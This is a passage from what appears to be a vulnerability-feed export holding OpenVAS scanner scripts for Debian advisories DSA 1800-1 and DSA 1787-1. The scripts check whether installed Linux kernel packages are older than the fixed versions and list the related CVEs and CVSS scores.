\"CVE-2009-1337\", \"CVE-2009-1338\", \"CVE-2009-1439\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"Debian Security Advisory DSA 1800-1 (linux-2.6)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"linux-support-2.6.26-2\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-manual-2.6.26\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-tree-2.6.26\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-source-2.6.26\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-patch-debian-2.6.26\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-doc-2.6.26\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-alpha-legacy\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-alpha-legacy\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-common\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-alpha-generic\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-alpha-smp\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-alpha\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-alpha-smp\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-amd64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-common-xen\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-amd64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-amd64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-common-openvz\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-xen-amd64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-2.6.26-2-xen-amd64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-modules-2.6.26-2-xen-amd64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-openvz-amd64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-amd64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-common-vserver\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-amd64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-openvz-amd64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-xen-amd64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"user-mode-linux\", ver:\"2.6.26-1um-2+15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-orion5x\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-ixp4xx\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-footbridge\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-orion5x\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-footbridge\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-ixp4xx\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-iop32x\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-arm\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-iop32x\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-versatile\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-armel\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-versatile\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-parisc64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-parisc64-smp\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-parisc64-smp\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-hppa\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-parisc64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-parisc\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-parisc-smp\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-parisc-smp\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-parisc\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-openvz-686\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-686-bigmem\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-xen-686\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-686\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-2.6.26-2-xen-686\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-686-bigmem\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-486\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-686-bigmem\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-686\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-686\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-686-bigmem\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-openvz-686\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-modules-2.6.26-2-xen-686\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-xen-686\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-i386\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-686\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-486\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-mckinley\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-mckinley\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-mckinley\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-mckinley\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-itanium\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-ia64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-itanium\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-itanium\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-itanium\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-5kc-malta\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-sb1-bcm91250a\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-sb1a-bcm91480b\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-sb1-bcm91250a\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-4kc-malta\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-r4k-ip22\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-sb1a-bcm91480b\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-mips\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-r5k-ip32\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-5kc-malta\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-r4k-ip22\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-r5k-ip32\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-4kc-malta\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-mipsel\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-r5k-cobalt\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-r5k-cobalt\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-powerpc\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-powerpc64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-powerpc64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-powerpc64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-powerpc\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-powerpc\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-powerpc\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-powerpc-smp\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-powerpc\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-powerpc64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-powerpc-smp\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-s390x\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-s390x\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-s390x\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-s390\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-s390\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-s390-tape\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-s390x\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-s390\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-sparc\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-sparc64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-sparc64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-sparc64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-sparc64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-sparc64-smp\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-sparc64-smp\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:57:08", "description": "The remote host is missing an update to linux-2.6.24\nannounced via advisory DSA 1787-1.", "cvss3": {}, "published": "2009-05-05T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 1787-1 (linux-2.6.24)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-5702", "CVE-2009-1046", "CVE-2008-5395", "CVE-2008-5700", "CVE-2009-0859", "CVE-2009-0675", "CVE-2008-4307", "CVE-2009-0028", "CVE-2009-1242", "CVE-2009-0322", "CVE-2009-0676", "CVE-2009-1192", "CVE-2008-5079", "CVE-2009-0065", "CVE-2009-0745", "CVE-2009-1338", "CVE-2009-1337", "CVE-2009-0269", "CVE-2009-0834", "CVE-2009-1265", "CVE-2009-0031", "CVE-2009-1439", "CVE-2009-0029", "CVE-2008-5701"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:63939", "href": "http://plugins.openvas.org/nasl.php?oid=63939", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1787_1.nasl 6615 2017-07-07 12:09:52Z cfischer $\n# Description: Auto-generated from advisory DSA 1787-1 (linux-2.6.24)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a denial of service or privilege escalation. For details,\nplease visit the referenced security advisories.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 2.6.24-6~etchnhalf.8etch1.\n\nWe recommend that you upgrade your linux-2.6.24 packages.\";\ntag_summary = \"The remote host is missing an update to linux-2.6.24\nannounced via advisory DSA 1787-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201787-1\";\n\n\nif(description)\n{\n script_id(63939);\n script_version(\"$Revision: 6615 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:52 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 16:00:35 +0200 (Tue, 05 May 2009)\");\n script_cve_id(\"CVE-2008-4307\", \"CVE-2008-5079\", \"CVE-2008-5395\", \"CVE-2008-5700\", \"CVE-2008-5701\", \"CVE-2008-5702\", \"CVE-2009-0028\", \"CVE-2009-0029\", \"CVE-2009-0031\", \"CVE-2009-0065\", \"CVE-2009-0269\", \"CVE-2009-0322\", \"CVE-2009-0675\", \"CVE-2009-0676\", \"CVE-2009-0745\", \"CVE-2009-0834\", \"CVE-2009-0859\", \"CVE-2009-1046\", \"CVE-2009-1192\", \"CVE-2009-1242\", \"CVE-2009-1265\", \"CVE-2009-1337\", \"CVE-2009-1338\", \"CVE-2009-1439\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1787-1 (linux-2.6.24)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"linux-tree-2.6.24\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-doc-2.6.24\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-support-2.6.24-etchnhalf.1\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-manual-2.6.24\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-source-2.6.24\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-patch-debian-2.6.24\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-alpha\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-alpha-legacy\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-alpha-smp\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-alpha-generic\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-alpha-smp\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-alpha-generic\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-common\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-alpha-legacy\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = 